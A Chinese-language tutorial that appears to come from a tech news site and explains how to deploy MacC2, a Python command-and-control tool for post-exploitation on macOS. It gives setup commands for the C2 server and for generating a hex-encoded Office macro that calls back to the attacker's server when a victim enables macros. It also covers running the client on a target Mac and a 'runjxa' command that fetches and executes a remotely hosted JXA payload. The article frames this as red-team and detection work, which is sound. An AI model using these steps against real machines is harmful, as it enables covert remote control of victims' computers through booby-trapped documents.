如何使用MacC2对macOS进行后渗透漏洞利用

发布时间:2021-09-15 17:51:42 作者:小新
来源:亿速云 阅读:234

小编给大家分享一下如何使用MacC2对macOS进行后渗透漏洞利用,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!

MacC2

MacC2是一款基于Python开发的macOS后渗透漏洞利用工具,该工具使用的是Objective-C调用或Python代码库,而并非命令行执行。MacC2的客户端基于Python2开发,虽然Python2现在已经算是被弃用了,但它仍然可以随Big Sur安装一起提供。在将来,苹果很可能会从macOS的基础安装组件中移除Python2(或者直接删除预置的Python环境支持),但直到2020年11月,这种情况还没出现。

该工具的主要目的是为了帮助安全研究团队进行渗透测试技术演练,并在macOS上构建针对Python后渗透漏洞利用框架的检测机制。苹果计划会将脚本运行时环境从macOS的基础安装中移除,具体何时删除我们还不得而知,不过现在的Big Sur安装还是包括了Python的。

当前版本的MacC2已在Catalina和Big Sur上进行了测试。在Big-Sur上,惟一没有按预期工作的函数是systeminfo命令.

您可以在本地设置服务器,也可以使用我在这个项目代码库中提供的Docker设置。

使用Docker运行MacC2

如果你还没有安装Docker的话,请使用下列命令安装和配置Docker:

chmod +x install_docker_linux.sh

sudo ./install_docker_linux.sh

接下来,运行下列命令。下列命令将会创建一个不受信任的SSL证书以及密钥,并为服务器和端口生成一个宏文件(macro.txt),然后构建macc2-docker。构建完成后,将会在macc2-docker中以交互模式运行MacC2服务器。

此时,工具将要求我们输出MacC2服务器的IP/主机名:

如何使用MacC2对macOS进行后渗透漏洞利用

然后输入MacC2服务器需要监听的端口号:

如何使用MacC2对macOS进行后渗透漏洞利用

工具将生成一个十六进制编码的Payload,存储在一个名为macro.txt的本地文件中,它能够连接至你的MacC2服务器,主机名、IP和端口均对应用户的设置:

如何使用MacC2对macOS进行后渗透漏洞利用

Docker将会安装aiohttp Python3依赖,构建macc2-docker,然后在容器中运行MacC2服务器。完成之后,MacC2服务器将会监听用户所指定的端口:

如何使用MacC2对macOS进行后渗透漏洞利用

现在,我们就可以使用下列命令验证MacC2服务器的运行状态了:

docker ps

除此之外,安装脚本还会在容器和主机之间配置一个共享挂载。在主机上,我们可以浏览/var/lib/docker/volumes/macc2/_data来访问MacC2_client.py和macro.txt。

我们还可以将MacC2_client.py文件拷贝到客户端,执行之后将提供回调,或者直接将macro.txt宏文件导入至一个Office文档,启用宏功能之后,将在客户端打开回调。

本地运行(不使用Docker)

如果你不想使用Docker,你还可以在本地搭建和配置服务器:

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/cedowens/MacC2.git

由于MacC2服务器使用了aiohttp库来进行网络通信,因此我们要先安装aiohttp:

pip install aiohttp

python3 -m pip install --upgrade --force pip

接下来,在C2服务器上,配置SSL(密钥大小至少为2048):

openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key

openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem

请注意,ca.pem和ca.key的文件名不要修改。

然后,使用macro_generator.py来创建MacC2脚本,然后指定服务器的IP/域名以及端口号。macro_generator.py还会构建一个十六进制编码的宏文件(macro.txt)来运行MacC2.我们可以将文件中的内容拷贝到一个MS Office文档中。

使用样例:

python3 macro_generatory.py -s [C2 Server IP/domain] -p [C2 Server Port]

如何使用MacC2对macOS进行后渗透漏洞利用

使用MacC2_server.py脚本监听连接:

如何使用MacC2对macOS进行后渗透漏洞利用

在客户端(目标为macOS主机),使用下列命令运行MacC2_client.py脚本:

python MacC2_client.py

如何使用MacC2对macOS进行后渗透漏洞利用

此时在服务器端,你将看到传入的连接:

如何使用MacC2对macOS进行后渗透漏洞利用

MacC2使用

收到连接之后,我们可以在服务器端使用“help”命令来获取内置可用的命令列表,然后输入目标命令来查看详细信息:

如何使用MacC2对macOS进行后渗透漏洞利用

你还可以生成一个Mythic C2 JXA .js Payload,然后将其托管至一台远程服务器中。接下来,使用runjxa命令来向MacC2提供托管文件的URL,并执行Mythic .JXA Payload:

>>> runjxa <url_to_JXA_.js_payload>

看完了这篇文章,相信你对“如何使用MacC2对macOS进行后渗透漏洞利用”有了一定的了解,如果想了解更多相关知识,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

推荐阅读:
  1. 记MacOS抹盘后--使用U盘安装MacOS实录
  2. 使用HAProxy对mongos进行负载后PHP报错

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

macos

上一篇:IE浏览器与FF浏览器关于Ajax传递参数值为中文时的区别是怎样的

下一篇:linux怎么设置DNS轮询实现负载平衡

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》